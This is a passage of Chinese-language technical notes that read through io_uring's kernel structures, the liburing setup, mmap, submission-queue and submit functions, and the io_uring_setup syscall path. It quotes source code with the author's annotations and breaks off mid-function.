restricted: 1; unsigned int off_timeout_used: 1; unsigned int drain_active: 1; unsigned int has_evfd: 1; /* all CQEs should be posted only by the submitter task */ unsigned int task_complete: 1; unsigned int lockless_cq: 1; unsigned int syscall_iopoll: 1; unsigned int poll_activated: 1; unsigned int drain_disabled: 1; unsigned int compat: 1; struct task_struct *submitter_task; struct io_rings *rings; struct percpu_ref refs; enum task_work_notify_mode notify_method; &#125; ____cacheline_aligned_in_smp; /* submission data */ struct &#123; struct mutex uring_lock; /* * Ring buffer of indices into array of io_uring_sqe, which is * mmapped by the application using the IORING_OFF_SQES offset. * * This indirection could e.g. be used to assign fixed * io_uring_sqe entries to operations and only submit them to * the queue when needed. * * The kernel modifies neither the indices array nor the entries * array. */ u32 *sq_array; struct io_uring_sqe *sq_sqes; unsigned cached_sq_head; unsigned sq_entries; /* * Fixed resources fast path, should be accessed only under * uring_lock, and updated through io_uring_register(2) */ struct io_rsrc_node *rsrc_node; atomic_t cancel_seq; struct io_file_table file_table; unsigned nr_user_files; unsigned nr_user_bufs; struct io_mapped_ubuf **user_bufs; struct io_submit_state submit_state; struct io_buffer_list *io_bl; struct xarray io_bl_xa; struct io_hash_table cancel_table_locked; struct io_alloc_cache apoll_cache; struct io_alloc_cache netmsg_cache; /* * -&gt;iopoll_list is protected by the ctx-&gt;uring_lock for * io_uring instances that don&#x27;t use IORING_SETUP_SQPOLL. * For SQPOLL, only the single threaded io_sq_thread() will * manipulate the list, hence no extra locking is needed there. */ struct io_wq_work_list iopoll_list; bool poll_multi_queue; &#125; ____cacheline_aligned_in_smp; struct &#123; /* * We cache a range of free CQEs we can use, once exhausted it * should go through a slower range setup, see __io_get_cqe() */ struct io_uring_cqe *cqe_cached; struct io_uring_cqe *cqe_sentinel; unsigned cached_cq_tail; unsigned cq_entries; struct io_ev_fd __rcu *io_ev_fd; unsigned cq_extra; &#125; ____cacheline_aligned_in_smp; /* * task_work and async notification delivery cacheline. Expected to * regularly bounce b/w CPUs. */ struct &#123; struct llist_head work_llist; unsigned long check_cq; atomic_t cq_wait_nr; atomic_t cq_timeouts; struct wait_queue_head cq_wait; &#125; ____cacheline_aligned_in_smp; /* timeouts */ struct &#123; spinlock_t timeout_lock; struct list_head timeout_list; struct list_head ltimeout_list; unsigned cq_last_tm_flush; &#125; ____cacheline_aligned_in_smp; struct io_uring_cqe completion_cqes[16]; spinlock_t completion_lock; /* IRQ completion list, under -&gt;completion_lock */ struct io_wq_work_list locked_free_list; unsigned int locked_free_nr; struct list_head io_buffers_comp; struct list_head cq_overflow_list; struct io_hash_table cancel_table; const struct cred *sq_creds; /* cred used for __io_sq_thread() */ struct io_sq_data *sq_data; /* if using sq thread polling */ struct wait_queue_head sqo_sq_wait; struct list_head sqd_list; unsigned int file_alloc_start; unsigned int file_alloc_end; struct xarray personalities; u32 pers_next; struct list_head io_buffers_cache; /* Keep this last, we don&#x27;t need it for the fast path */ struct wait_queue_head poll_wq; struct io_restriction restrictions; /* slow path rsrc auxilary data, used by update/register */ struct io_mapped_ubuf *dummy_ubuf; struct io_rsrc_data *file_data; struct io_rsrc_data *buf_data; /* protected by -&gt;uring_lock */ struct list_head rsrc_ref_list; struct io_alloc_cache rsrc_node_cache; struct wait_queue_head rsrc_quiesce_wq; unsigned rsrc_quiesce; struct list_head io_buffers_pages; #if defined(CONFIG_UNIX) struct socket *ring_sock; #endif /* hashed buffered write serialization */ struct io_wq_hash *hash_map; /* Only used for accounting purposes */ struct user_struct *user; struct mm_struct *mm_account; /* ctx exit and cancelation */ struct llist_head fallback_llist; struct delayed_work fallback_work; struct work_struct exit_work; struct list_head tctx_list; struct completion ref_comp; /* io-wq management, e.g. thread count */ u32 iowq_limits[2]; bool iowq_limits_set; struct callback_head poll_wq_task_work; struct list_head defer_list; unsigned sq_thread_idle; /* protected by -&gt;completion_lock */ unsigned evfd_last_cq_tail; /* * If IORING_SETUP_NO_MMAP is used, then the below holds * the gup&#x27;ed pages for the two rings, and the sqes. */ unsigned short n_ring_pages; unsigned short n_sqe_pages; struct page **ring_pages; struct page **sqe_pages;&#125;; liburing liburing 提供的核心接口有如下函数: io_uring_queue_init io_uring的初始化结构，用来初始化一个 io_uring 结构体 io_uring_prep_xxx 用来创建一个任务 io_uring_submit 用来提交一个任务 io_uring_queue_init 参数: entries: sq队列大小 rings: io_uring 结构体, liburing提供给用户态的管理结构 flags: 传递给 io_uring_setup 的 params 中的 flag, 用来控制创建的io_uring的特性, 详情可以看 io_uring_set_up 返回值: fd: 用来mmap的fd 12345678910__cold int io_uring_queue_init(unsigned entries, struct io_uring *ring, unsigned flags)&#123; struct io_uring_params p; memset(&amp;p, 0, sizeof(p)); p.flags = flags; return io_uring_queue_init_params(entries, ring, &amp;p);&#125; 接下来是一系列调用链: 1234--&gt;io_uring_queue_init --&gt;io_uring_queue_init_params --&gt;io_uring_queue_init_try_nosqarr --&gt;__io_uring_queue_init_params 最后到 __io_uring_queue_init_params 其中 p 是要传递给 io_uring_setup 的params, buf 的使用将在后面分析. 123456789101112131415161718int __io_uring_queue_init_params(unsigned entries, struct io_uring *ring, struct io_uring_params *p, void *buf, size_t buf_size)&#123; int fd, ret = 0; unsigned *sq_array; unsigned sq_entries, index; memset(ring, 0, sizeof(*ring)); /* * The kernel does this check already, but checking it here allows us * to avoid handling it below. */ if (p-&gt;flags &amp; IORING_SETUP_REGISTERED_FD_ONLY &amp;&amp; !(p-&gt;flags &amp; IORING_SETUP_NO_MMAP)) return -EINVAL; // 如果设置了REGISTERED_FD_ONLY 就必须要设置 NO_MMAP 对于设置了NO_MMAP的请求，通过 io_uring_alloc_huge 进行了预处理，这个函数我们将在之后[[#io_uring_alloc_huge]]进行分析 123456789if (p-&gt;flags &amp; IORING_SETUP_NO_MMAP) &#123; ret = io_uring_alloc_huge(entries, p, &amp;ring-&gt;sq, &amp;ring-&gt;cq, buf, buf_size); if (ret &lt; 0) return ret; if (buf) ring-&gt;int_flags |= INT_FLAG_APP_MEM;&#125;// 如果设置了NO_MMAP，就要预先分配大内存 接下来就是调用io_uring_setup 完成真正的初始化操作了。 1234567891011fd = __sys_io_uring_setup(entries, p);// syscall(__NR_io_uring_setup, entries, p) if (fd &lt; 0) &#123; if ((p-&gt;flags &amp; IORING_SETUP_NO_MMAP) &amp;&amp; !(ring-&gt;int_flags &amp; INT_FLAG_APP_MEM)) &#123; __sys_munmap(ring-&gt;sq.sqes, 1); io_uring_unmap_rings(&amp;ring-&gt;sq, &amp;ring-&gt;cq); &#125; return fd;&#125;// 错误处理 对于没有设置 NO_MMAP 的情形，需要在此时mmap为sq和cq在用户态映射内存[[#io_uring_queue_mmap]]，反之，直接设置ring相关指针[[#io_uring_setup_ring_pointers]] 123456789if (!(p-&gt;flags &amp; IORING_SETUP_NO_MMAP)) &#123; ret = io_uring_queue_mmap(fd, p, ring); if (ret) &#123; __sys_close(fd); return ret; &#125;&#125; else &#123; io_uring_setup_ring_pointers(p, &amp;ring-&gt;sq, &amp;ring-&gt;cq);&#125; 之后，是将io_uring_setup 设置在 params 中的各种变量复制到用户态管理结构体ring中。 12345678910111213141516171819202122 sq_entries = ring-&gt;sq.ring_entries; if (!(p-&gt;flags &amp; IORING_SETUP_NO_SQARRAY)) &#123; sq_array = ring-&gt;sq.array; for (index = 0; index &lt; sq_entries; index++) sq_array[index] = index; &#125; ring-&gt;features = p-&gt;features; // io_uring 的 特性 ring-&gt;flags = p-&gt;flags; // io_uring 设置的标志 ring-&gt;enter_ring_fd = fd; // 返回的fd if (p-&gt;flags &amp; IORING_SETUP_REGISTERED_FD_ONLY) &#123; ring-&gt;ring_fd = -1; ring-&gt;int_flags |= INT_FLAG_REG_RING | INT_FLAG_REG_REG_RING; &#125; else &#123; ring-&gt;ring_fd = fd; &#125; return ret;&#125; io_uring_alloc_huge io_uring_alloc_huge 是对于设置了NO_MMAP的程序，预先在用户态设置好SQ和CQ的内存的函数 首先是会用到的各种参数和变量 1234567891011static int io_uring_alloc_huge(unsigned entries, struct io_uring_params *p, struct io_uring_sq *sq, struct io_uring_cq *cq, void *buf, size_t buf_size)&#123; unsigned long page_size = get_page_size(); unsigned sq_entries, cq_entries; size_t ring_mem, sqes_mem; unsigned long mem_used = 0; void *ptr; int ret; 接下来是首先确定了sq和eq entrie的数量。这里具体的算法就不在这里分析了，主要包括合法性检查和幂2向上取整的运算等。 123ret = get_sq_cq_entries(entries, p, &amp;sq_entries, &amp;cq_entries);if (ret) return ret; 接下来就是计算sq和cq需要的内存大小了，计算过程非常直观，笔者就不赘述了： 123456789sqes_mem = sq_entries * sizeof(struct io_uring_sqe);sqes_mem = (sqes_mem + page_size - 1) &amp; ~(page_size - 1);ring_mem = cq_entries * sizeof(struct io_uring_cqe);if (p-&gt;flags &amp; IORING_SETUP_CQE32) ring_mem *= 2;if (!(p-&gt;flags &amp; IORING_SETUP_NO_SQARRAY)) ring_mem += sq_entries * sizeof(unsigned);mem_used = sqes_mem + ring_mem;mem_used = (mem_used + page_size - 1) &amp; ~(page_size - 1); 接下来，就是真正决定sq和cq的用户态地址了。 首先，如果用户传入了buf，并且buf_size足够大， 那么就设置为用户buf 否则，就mmap出一片内存来使用（根据size计算的不同可能是4K也可能是4M，分别是一页和一个大页(二级页表对应的大小)） 12345678910111213141516171819202122if (!buf &amp;&amp; (sqes_mem &gt; huge_page_size || ring_mem &gt; huge_page_size)) return -ENOMEM;if (buf) &#123; if (mem_used &gt; buf_size) return -ENOMEM; ptr = buf;&#125; else &#123; int map_hugetlb = 0; if (sqes_mem &lt;= page_size) buf_size = page_size; else &#123; buf_size = huge_page_size; map_hugetlb = MAP_HUGETLB; &#125; ptr = __sys_mmap(NULL, buf_size, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS|map_hugetlb, -1, 0); if (IS_ERR(ptr)) return PTR_ERR(ptr);&#125;sq-&gt;sqes = ptr; 并以类似的方式设置了sq-&gt;ring_ptr 123456789101112131415161718192021222324252627282930if (mem_used &lt;= buf_size)&#123; sq-&gt;ring_ptr = (void *)sq-&gt;sqes + sqes_mem; /* clear ring sizes, we have just one mmap() to undo */ cq-&gt;ring_sz = 0; sq-&gt;ring_sz = 0;&#125;else&#123; int map_hugetlb = 0; if (ring_mem &lt;= page_size) buf_size = page_size; else &#123; buf_size = huge_page_size; map_hugetlb = MAP_HUGETLB; &#125; ptr = __sys_mmap(NULL, buf_size, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | map_hugetlb, -1, 0); if (IS_ERR(ptr)) &#123; __sys_munmap(sq-&gt;sqes, 1); return PTR_ERR(ptr); &#125; sq-&gt;ring_ptr = ptr; sq-&gt;ring_sz = buf_size; cq-&gt;ring_sz = 0;&#125; 不过下面一部分就是真正重要的了： p正是传入 io_uring_setup 的结构体，所以对p的赋值才是至关重要的，这里的sq和cq不过是 liburing 暴露给用户的管理结构 io_uring 中的一个成员 1234cq-&gt;ring_ptr = (void *)sq-&gt;ring_ptr;p-&gt;sq_off.user_addr = (unsigned long)sq-&gt;sqes;p-&gt;cq_off.user_addr = (unsigned long)sq-&gt;ring_ptr;return (int)mem_used; 所以规根结底就是写入了 p的 sq_off 和 cq_off io_uring_queue_mmap 这是对于没有设置NO_MMAP的情形下，完成了 syscall io_uring_setup 处理后，mmap的流程 123456__cold int io_uring_queue_mmap(int fd, struct io_uring_params *p, struct io_uring *ring)&#123; memset(ring, 0, sizeof(*ring)); return io_uring_mmap(fd, p, &amp;ring-&gt;sq, &amp;ring-&gt;cq);&#125; 首先是计算了sq和cq的ring的size 123456789101112static int io_uring_mmap(int fd, struct io_uring_params *p, struct io_uring_sq *sq, struct io_uring_cq *cq)&#123; size_t size; int ret; size = sizeof(struct io_uring_cqe); if (p-&gt;flags &amp; IORING_SETUP_CQE32) size += sizeof(struct io_uring_cqe); sq-&gt;ring_sz = p-&gt;sq_off.array + p-&gt;sq_entries * sizeof(unsigned); cq-&gt;ring_sz = p-&gt;cq_off.cqes + p-&gt;cq_entries * size; 然后开始mmap sq 和 cq ring的指针： 1234567891011121314151617181920212223242526272829if (p-&gt;features &amp; IORING_FEAT_SINGLE_MMAP)&#123; if (cq-&gt;ring_sz &gt; sq-&gt;ring_sz) sq-&gt;ring_sz = cq-&gt;ring_sz; cq-&gt;ring_sz = sq-&gt;ring_sz;&#125;sq-&gt;ring_ptr = __sys_mmap(0, sq-&gt;ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, fd, IORING_OFF_SQ_RING);// offset = 0if (IS_ERR(sq-&gt;ring_ptr)) return PTR_ERR(sq-&gt;ring_ptr);if (p-&gt;features &amp; IORING_FEAT_SINGLE_MMAP)&#123; cq-&gt;ring_ptr = sq-&gt;ring_ptr;&#125;else&#123; cq-&gt;ring_ptr = __sys_mmap(0, cq-&gt;ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, fd, IORING_OFF_CQ_RING); // offset = 8000000 if (IS_ERR(cq-&gt;ring_ptr)) &#123; ret = PTR_ERR(cq-&gt;ring_ptr); cq-&gt;ring_ptr = NULL; goto err; &#125;&#125; 如果设置了 IORING_FEAT_SINGLE_MMAP ，就可以将sq 和 cq的ring一起mmap，否则，就分别单独mmap 最后再mmap sq的sqes 12345678910111213size = sizeof(struct io_uring_sqe);if (p-&gt;flags &amp; IORING_SETUP_SQE128) size += 64;sq-&gt;sqes = __sys_mmap(0, size * p-&gt;sq_entries, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, fd, IORING_OFF_SQES);if (IS_ERR(sq-&gt;sqes))&#123; ret = PTR_ERR(sq-&gt;sqes);err: io_uring_unmap_rings(sq, cq); return ret;&#125; 最后的最后，设置相关指针 [[#io_uring_setup_ring_pointers]] 1io_uring_setup_ring_pointers(p, sq, cq); io_uring_setup_ring_pointers 此函数用来设置 struct io_uring ring 也就是liburing的核心管理结构体. 我们知道 sq-&gt;ring_ptr 在 kernel被映射到一个内核结构体, 其中结构体各个成员的偏移通过 io_uring_params 的两个 offset 成员结构体返回, 这里通过此拿到结构体对应成员的指针, 并赋值给 sq 和 cq 的各个成员, 这里的 sq 和 cq 又是 管理结构体 ring 的成员 123456789101112131415161718192021222324252627282930313233static void io_uring_setup_ring_pointers(struct io_uring_params *p, struct io_uring_sq *sq, struct io_uring_cq *cq)&#123; sq-&gt;khead = sq-&gt;ring_ptr + p-&gt;sq_off.head; // 设置sq head的指针 sq-&gt;ktail = sq-&gt;ring_ptr + p-&gt;sq_off.tail; // 设置sq tail指针 sq-&gt;kring_mask = sq-&gt;ring_ptr + p-&gt;sq_off.ring_mask; sq-&gt;kring_entries = sq-&gt;ring_ptr + p-&gt;sq_off.ring_entries; // 设置sq entries个数 sq-&gt;kflags = sq-&gt;ring_ptr + p-&gt;sq_off.flags; // 设置对应标志 sq-&gt;kdropped = sq-&gt;ring_ptr + p-&gt;sq_off.dropped; if (!(p-&gt;flags &amp; IORING_SETUP_NO_SQARRAY)) sq-&gt;array = sq-&gt;ring_ptr + p-&gt;sq_off.array; // 如果存在sqarray cq-&gt;khead = cq-&gt;ring_ptr + p-&gt;cq_off.head; // 设置cq head指针 cq-&gt;ktail = cq-&gt;ring_ptr + p-&gt;cq_off.tail; // 设置cq tail指针 cq-&gt;kring_mask = cq-&gt;ring_ptr + p-&gt;cq_off.ring_mask; cq-&gt;kring_entries = cq-&gt;ring_ptr + p-&gt;cq_off.ring_entries; cq-&gt;koverflow = cq-&gt;ring_ptr + p-&gt;cq_off.overflow; cq-&gt;cqes = cq-&gt;ring_ptr + p-&gt;cq_off.cqes; if (p-&gt;cq_off.flags) cq-&gt;kflags = cq-&gt;ring_ptr + p-&gt;cq_off.flags; sq-&gt;ring_mask = *sq-&gt;kring_mask; sq-&gt;ring_entries = *sq-&gt;kring_entries; cq-&gt;ring_mask = *cq-&gt;kring_mask; cq-&gt;ring_entries = *cq-&gt;kring_entries;&#125; io_uring_get_sqe 此函数用来获取一个可用 sqe 用来提交任务，最终是调用了 _io_uring_get_sqe， 整个函数用非常优雅的方式实现了循环队列// #Elegant 123456789101112131415161718192021222324252627282930IOURINGINLINE struct io_uring_sqe *_io_uring_get_sqe(struct io_uring *ring)&#123; struct io_uring_sq *sq = &amp;ring-&gt;sq; unsigned int head, next = sq-&gt;sqe_tail + 1; int shift = 0; if (ring-&gt;flags &amp; IORING_SETUP_SQE128) shift = 1; if (!(ring-&gt;flags &amp; IORING_SETUP_SQPOLL)) head = IO_URING_READ_ONCE(*sq-&gt;khead); else head = io_uring_smp_load_acquire(sq-&gt;khead); // 通过原子读获取head // sq-&gt;khead = sq-&gt;ring_ptr + p-&gt;sq_off.head; // 这里实际上读的是共享内存的一个指针内存的 uint 值 if (next - head &lt;= sq-&gt;ring_entries) &#123; struct io_uring_sqe *sqe; sqe = &amp;sq-&gt;sqes[(sq-&gt;sqe_tail &amp; sq-&gt;ring_mask) &lt;&lt; shift]; // sq-&gt;ring_mask 来自kernel 设置的params // rings-&gt;sq_ring_mask = p-&gt;sq_entries - 1; // 由于sq_entries 为2的幂次倍 // 这里实际上就是一个循环队列的访问， sq-&gt;sqe_tail = next; return sqe; &#125; return NULL;&#125; io_uring_prep_xxx 这是一个系列函数, 用来实现 io_uring 提供的各种 io操作, 其根本实现是 设置 一个 sqe 结构体(这个结构体是内核的API), 这里以 io_uring_prep_openat 为例 1234567IOURINGINLINE void io_uring_prep_openat(struct io_uring_sqe *sqe, int dfd, const char *path, int flags, mode_t mode)&#123; io_uring_prep_rw(IORING_OP_OPENAT, sqe, dfd, path, mode, 0); sqe-&gt;open_flags = (__u32) flags;&#125; 12345678910111213141516171819202122IOURINGINLINE void io_uring_prep_rw(int op, struct io_uring_sqe *sqe, int fd, const void *addr, unsigned len, __u64 offset)&#123; sqe-&gt;opcode = (__u8) op; // 设置op为 open sqe-&gt;flags = 0 sqe-&gt;ioprio = 0; sqe-&gt;fd = fd; // 提供表示dir 的 -100 fd sqe-&gt;off = offset; // 0 sqe-&gt;addr = (unsigned long) addr; // 提供文件地址 sqe-&gt;len = len; sqe-&gt;rw_flags = 0; sqe-&gt;buf_index = 0; sqe-&gt;personality = 0; sqe-&gt;file_index = 0; sqe-&gt;addr3 = 0; sqe-&gt;__pad2[0] = 0;&#125; 归根结底就是设置了一个sqe 这里笔者有一个问题： #TODO 在IORING_SETUP_SQROLL时, io_uring用户和内核采用共享内存通信，内核态是如何知道一个sqe的全部参数已经设置完毕了，有没有可能用户态正在设置sqe的部分成员时，内核已经在处理这个sqe了？ 在之后 [[#__io_uring_flush_sq]] 笔者似乎找到了这个问题的答案： 通过 memory_store_release 保证sqe的更新不会被重排到 ktail 的修改前 通过 修改 ktail 表示真正提交了一个任务 io_uring_submit io_uring_submit 用于提交一个任务 1234int io_uring_submit(struct io_uring *ring)&#123; return __io_uring_submit_and_wait(ring, 0);&#125; 12345static int __io_uring_submit_and_wait(struct io_uring *ring, unsigned wait_nr)&#123; return __io_uring_submit(ring, __io_uring_flush_sq(ring), wait_nr, false);&#125; 最终到达 __io_uring_submit. 不过这个函数, 在SQPOLL模式下用处不大, 真正的提交操作应该说是在 __io_uring_flush_sq 中实现的. 这里主要是判断当前情况需不需要调用 io_uring_enter syscall. 如果当前 是IOPOLL模式, 就需要 io_uring_enter 来收割任务. 如果是 SQPOLL 模式， 且 内核处理线程已 idle ，那么就通过 io_uring_enter syscall 来唤醒 123456789101112131415161718192021static int __io_uring_submit(struct io_uring *ring, unsigned submitted, unsigned wait_nr, bool getevents)&#123; bool cq_needs_enter = getevents || wait_nr || cq_ring_needs_enter(ring); unsigned flags; int ret; flags = 0; if (sq_ring_needs_enter(ring, submitted, &amp;flags) || cq_needs_enter) &#123; if (cq_needs_enter) flags |= IORING_ENTER_GETEVENTS; if (ring-&gt;int_flags &amp; INT_FLAG_REG_RING) flags |= IORING_ENTER_REGISTERED_RING; ret = __sys_io_uring_enter(ring-&gt;enter_ring_fd, submitted, wait_nr, flags, NULL); &#125; else ret = submitted; return ret;&#125; __io_uring_flush_sq 主要用来更新内核sq 的tail指针， 最终返回需要提交的任务数 123456789101112131415161718192021static unsigned __io_uring_flush_sq(struct io_uring *ring)&#123; struct io_uring_sq *sq = &amp;ring-&gt;sq; unsigned tail = sq-&gt;sqe_tail; if (sq-&gt;sqe_head != tail) &#123; sq-&gt;sqe_head = tail; /* * Ensure kernel sees the SQE updates before the tail update. */ if (!(ring-&gt;flags &amp; IORING_SETUP_SQPOLL)) IO_URING_WRITE_ONCE(*sq-&gt;ktail, tail); // 原子读 else io_uring_smp_store_release(sq-&gt;ktail, tail); // memory_release 的内存序来写 &#125; */ return tail - *sq-&gt;khead;&#125; 在 SQPOLL 模式下,内核提交者可能同时在更新头指针。 对于非 SQPOLL 模式,应用自己更新头指针,不存在并发问题。 即使 SQPOLL 模式下,就算头指针读取是原子的,获取到的值也可能立即过期,存在并发修改的问题。 最坏情况下,读取的值会高估实际可提交的请求数。 在这里用到了一个原子写 IO_URING_WRITE_ONCE . 而 io_uring_smb_store_release 笔者涉及到内存序的问题，内存序是为了防止指令重排产生的，笔者还没有特别理解。 笔者尝试解释一下， 这里使用使用memory_order_release内存序标注这个存储操作 release内存序的特点是: 当前线程本地的修改对其他线程可见 防止存储操作被重新排序 这里应该是让此处对于sqe的修改，要在对于tail指针的修改前完成，防止指令重排的影响 如果是对于IOPOLL，内核的真正确认提交是在 io_uring_enter 实现的，其实是和当前处于同一个线程，因此不需要通过 memory_order_release 来保证 “当前线程本地的修改对其他线程可见”， 对同一线程的数据冒险应该是由旁路机制处理的 #TODO 123#define io_uring_smp_store_release(p, v) \\ atomic_store_explicit((_Atomic __typeof__(*(p)) *)(p), (v), \\ memory_order_release) syscall syscall是内核提供给用户态的接口，io_uring涉及三个syscall io_uring_setup(2) io_uring_enter(2) io_uring_register(2) 笔者这里主要讲述前两个syscall io_uring_setup 参数 entries: sq队列大小 params：提供的各种参数，许多返回值也会写入此结构体积 123456789101112131415161718192021222324252627static long io_uring_setup(u32 entries, struct io_uring_params __user *params)&#123; struct io_uring_params p; int i; if (copy_from_user(&amp;p, params, sizeof(p))) return -EFAULT; // 将params复制到内核空间 for (i = 0; i &lt; ARRAY_SIZE(p.resv); i++) &#123; if (p.resv[i]) return -EINVAL; &#125; if (p.flags &amp; ~(IORING_SETUP_IOPOLL | IORING_SETUP_SQPOLL | IORING_SETUP_SQ_AFF | IORING_SETUP_CQSIZE | IORING_SETUP_CLAMP | IORING_SETUP_ATTACH_WQ | IORING_SETUP_R_DISABLED | IORING_SETUP_SUBMIT_ALL | IORING_SETUP_COOP_TASKRUN | IORING_SETUP_TASKRUN_FLAG | IORING_SETUP_SQE128 | IORING_SETUP_CQE32 | IORING_SETUP_SINGLE_ISSUER | IORING_SETUP_DEFER_TASKRUN | IORING_SETUP_NO_MMAP | IORING_SETUP_REGISTERED_FD_ONLY | IORING_SETUP_NO_SQARRAY)) return -EINVAL; // 如果有非法flag，直接返回 return io_uring_create(entries, &amp;p, params);&#125; 接下来是首先检查entries 和flags。 12345678910111213141516171819static __cold int io_uring_create(unsigned entries, struct io_uring_params *p, struct io_uring_params __user *params)&#123; struct io_ring_ctx *ctx; struct io_uring_task *tctx; struct file *file; int ret; if (!entries) return -EINVAL; if (entries &gt; IORING_MAX_ENTRIES) &#123; if (!(p-&gt;flags &amp; IORING_SETUP_CLAMP)) return -EINVAL; entries = IORING_MAX_ENTRIES; &#125; if ((p-&gt;flags &amp; IORING_SETUP_REGISTERED_FD_ONLY) &amp;&amp; !(p-&gt;flags &amp; IORING_SETUP_NO_MMAP)) return -EINVAL; 设置sq_entries 以2的幂次向上取整， 这是为了方便环形队列的处理. 1234567891011121314151617181920p-&gt;sq_entries = roundup_pow_of_two(entries);if (p-&gt;flags &amp; IORING_SETUP_CQSIZE) &#123; /* * If IORING_SETUP_CQSIZE is set, we do the same roundup * to a power-of-two, if it isn&#x27;t already. We do NOT impose * any cq vs sq ring sizing. */ if (!p-&gt;cq_entries) return -EINVAL; if (p-&gt;cq_entries &gt; IORING_MAX_CQ_ENTRIES) &#123; if (!(p-&gt;flags &amp; IORING_SETUP_CLAMP)) return -EINVAL; p-&gt;cq_entries = IORING_MAX_CQ_ENTRIES; &#125; p-&gt;cq_entries = roundup_pow_of_two(p-&gt;cq_entries); if (p-&gt;cq_entries &lt; p-&gt;sq_entries) return -EINVAL;&#125; else &#123; p-&gt;cq_entries = 2 * p-&gt;sq_entries;&#125; 接下来是一系列设置ctx的代码，笔者暂且不在这里分析，之后遇见了再分析每一项 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273ctx = io_ring_ctx_alloc(p);if (!ctx) return -ENOMEM;if ((ctx-&gt;flags &amp; IORING_SETUP_DEFER_TASKRUN) &amp;&amp; !(ctx-&gt;flags &amp; IORING_SETUP_IOPOLL) &amp;&amp; !(ctx-&gt;flags &amp; IORING_SETUP_SQPOLL)) ctx-&gt;task_complete = true;if (ctx-&gt;task_complete || (ctx-&gt;flags &amp; IORING_SETUP_IOPOLL)) ctx-&gt;lockless_cq = true;/* * lazy poll_wq activation relies on -&gt;task_complete for synchronisation * purposes, see io_activate_pollwq() */if (!ctx-&gt;task_complete) ctx-&gt;poll_activated = true;/* * When SETUP_IOPOLL and SETUP_SQPOLL are both enabled, user * space applications don&#x27;t need to do io completion events * polling again, they can rely on io_sq_thread to do polling * work, which can reduce cpu usage and uring_lock contention. */if (ctx-&gt;flags &amp; IORING_SETUP_IOPOLL &amp;&amp; !(ctx-&gt;flags &amp; IORING_SETUP_SQPOLL)) ctx-&gt;syscall_iopoll = 1;ctx-&gt;compat = in_compat_syscall();if (!ns_capable_noaudit(&amp;init_user_ns, CAP_IPC_LOCK)) ctx-&gt;user = get_uid(current_user());/* * For SQPOLL, we just need a wakeup, always. For !SQPOLL, if * COOP_TASKRUN is set, then IPIs are never needed by the app. */ret = -EINVAL;if (ctx-&gt;flags &amp; IORING_SETUP_SQPOLL) &#123; /* IPI related flags don&#x27;t make sense with SQPOLL */ if (ctx-&gt;flags &amp; (IORING_SETUP_COOP_TASKRUN | IORING_SETUP_TASKRUN_FLAG | IORING_SETUP_DEFER_TASKRUN)) goto err; ctx-&gt;notify_method = TWA_SIGNAL_NO_IPI;&#125; else if (ctx-&gt;flags &amp; IORING_SETUP_COOP_TASKRUN) &#123; ctx-&gt;notify_method = TWA_SIGNAL_NO_IPI;&#125; else &#123; if (ctx-&gt;flags &amp; IORING_SETUP_TASKRUN_FLAG &amp;&amp; !(ctx-&gt;flags &amp; IORING_SETUP_DEFER_TASKRUN)) goto err; ctx-&gt;notify_method = TWA_SIGNAL;&#125;/* * For DEFER_TASKRUN we require the completion task to be the same as the * submission task. This implies that there is only one submitter, so enforce * that. */if (ctx-&gt;flags &amp; IORING_SETUP_DEFER_TASKRUN &amp;&amp; !(ctx-&gt;flags &amp; IORING_SETUP_SINGLE_ISSUER)) &#123; goto err;&#125;/* * This is just grabbed for accounting purposes. When a process exits, * the mm is exited and dropped before the files, hence we need to hang * on to this mm purely for the purposes of being able to unaccount * memory (locked/pinned vm). It&#x27;s not used for anything else. */mmgrab(current-&gt;mm);ctx-&gt;mm_account = current-&gt;mm; [[#io_allocate_scq_urings ]] 分配了scq和rings的内存 [[#io_sq_offload_create]] 创建了任务处理线程 1234567891011ret = io_allocate_scq_urings(ctx, p);if (ret) goto err;ret = io_sq_offload_create(ctx, p);if (ret) goto err;ret = io_rsrc_init(ctx);if (ret) goto err; 设置sq_off，即通过 params 返回给用户的 ring 中各个成员的偏移 1234567891011121314151617181920p-&gt;sq_off.head = offsetof(struct io_rings, sq.head);p-&gt;sq_off.tail = offsetof(struct io_rings, sq.tail);p-&gt;sq_off.ring_mask = offsetof(struct io_rings, sq_ring_mask);p-&gt;sq_off.ring_entries = offsetof(struct io_rings, sq_ring_entries);p-&gt;sq_off.flags = offsetof(struct io_rings, sq_flags);p-&gt;sq_off.dropped = offsetof(struct io_rings, sq_dropped);if (!(ctx-&gt;flags &amp; IORING_SETUP_NO_SQARRAY)) p-&gt;sq_off.array = (char *)ctx-&gt;sq_array - (char *)ctx-&gt;rings;p-&gt;sq_off.resv1 = 0;if (!(ctx-&gt;flags &amp; IORING_SETUP_NO_MMAP)) p-&gt;sq_off.user_addr = 0;p-&gt;cq_off.head = offsetof(struct io_rings, cq.head);p-&gt;cq_off.tail = offsetof(struct io_rings, cq.tail);p-&gt;cq_off.ring_mask = offsetof(struct io_rings, cq_ring_mask);p-&gt;cq_off.ring_entries = offsetof(struct io_rings, cq_ring_entries);p-&gt;cq_off.overflow = offsetof(struct io_rings, cq_overflow);p-&gt;cq_off.cqes = offsetof(struct io_rings, cqes);p-&gt;cq_off.flags = offsetof(struct io_rings, cq_flags);p-&gt;cq_off.resv1 = 0; 设置feature 1234567p-&gt;features = IORING_FEAT_SINGLE_MMAP | IORING_FEAT_NODROP | IORING_FEAT_SUBMIT_STABLE | IORING_FEAT_RW_CUR_POS | IORING_FEAT_CUR_PERSONALITY | IORING_FEAT_FAST_POLL | IORING_FEAT_POLL_32BITS | IORING_FEAT_SQPOLL_NONFIXED | IORING_FEAT_EXT_ARG | IORING_FEAT_NATIVE_WORKERS | IORING_FEAT_RSRC_TAGS | IORING_FEAT_CQE_SKIP | IORING_FEAT_LINKED_FILE | IORING_FEAT_REG_REG_RING; 再将params复制回用户空间 1234if (copy_to_user(params, p, sizeof(*p))) &#123; ret = -EFAULT; goto err;&#125; 最后是注册fd 12345678910111213141516171819202122232425if (ctx-&gt;flags &amp; IORING_SETUP_SINGLE_ISSUER &amp;&amp; !(ctx-&gt;flags &amp; IORING_SETUP_R_DISABLED)) 